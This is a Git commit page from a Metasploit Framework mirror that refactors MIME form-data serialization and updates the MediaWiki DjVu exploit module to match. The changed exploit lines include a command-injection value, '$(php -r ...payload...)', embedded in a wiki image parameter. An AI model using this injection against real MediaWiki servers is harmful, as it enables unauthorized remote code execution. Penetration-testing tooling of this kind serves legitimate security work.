infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Refactor form_data code

bug/bundler_fix
Meatballs 2014-02-03 21:16:58 +00:00
parent 67c18d8d2d
commit 83925da2f1
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2 changed files with 9 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
lib/rex/mime/message.rb
View File

@ -121,7 +121,7 @@ class Message
) )
end end
def to_s def to_s(form_data = false)
msg = self.header.to_s + "\r\n" msg = self.header.to_s + "\r\n"
if self.content and not self.content.empty? if self.content and not self.content.empty?
@ -129,27 +129,8 @@ class Message
end end
self.parts.each do |part| self.parts.each do |part|
msg << "--" + self.bound + "\r\n" msg << "--" + self.bound
msg << part.to_s + "\r\n" msg << "\r\n" unless form_data
end
if self.parts.length > 0
msg << "--" + self.bound + "--\r\n"
end
# Force CRLF for SMTP compatibility
msg.gsub("\r", '').gsub("\n", "\r\n")
end
def to_form_data
msg = self.header.to_s + "\r\n"
if self.content and not self.content.empty?
msg << self.content + "\r\n"
end
self.parts.each do |part|
msg << "--" + self.bound + "\r\n"
msg << part.to_s msg << part.to_s
end end
@ -157,7 +138,10 @@ class Message
msg << "--" + self.bound + "--\r\n" msg << "--" + self.bound + "--\r\n"
end end
msg unless form_data
# Force CRLF for SMTP compatibility
msg.gsub("\r", '').gsub("\n", "\r\n")
end
end end
end end

4
modules/exploits/multi/http/mediawiki_djvu.rb
View File

@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
upload_mime.add_part(title, nil, nil, "form-data; name=\"title\"") upload_mime.add_part(title, nil, nil, "form-data; name=\"title\"")
upload_mime.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"") upload_mime.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"")
upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\"wpUpload\"") upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\"wpUpload\"")
post_data = upload_mime.to_form_data post_data = upload_mime.to_s(true)
print_status("Uploading DjVu file #{file_name}...") print_status("Uploading DjVu file #{file_name}...")
@ -265,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote
edit_mime.add_part("[[Image:#{file_name}|width=9999|page=1$(php -r '#{payload.encoded}')]]", nil, nil, "form-data; name=\"wpTextbox1\"") edit_mime.add_part("[[Image:#{file_name}|width=9999|page=1$(php -r '#{payload.encoded}')]]", nil, nil, "form-data; name=\"wpTextbox1\"")
edit_mime.add_part("Save page", nil, nil, "form-data; name=\"wpSummary\"") edit_mime.add_part("Save page", nil, nil, "form-data; name=\"wpSummary\"")
edit_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\"wpEditToken\"") edit_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\"wpEditToken\"")
post_data = edit_mime.to_form_data post_data = edit_mime.to_s(true)
print_status("Sending payload request...") print_status("Sending payload request...")
edit = send_request_cgi({ edit = send_request_cgi({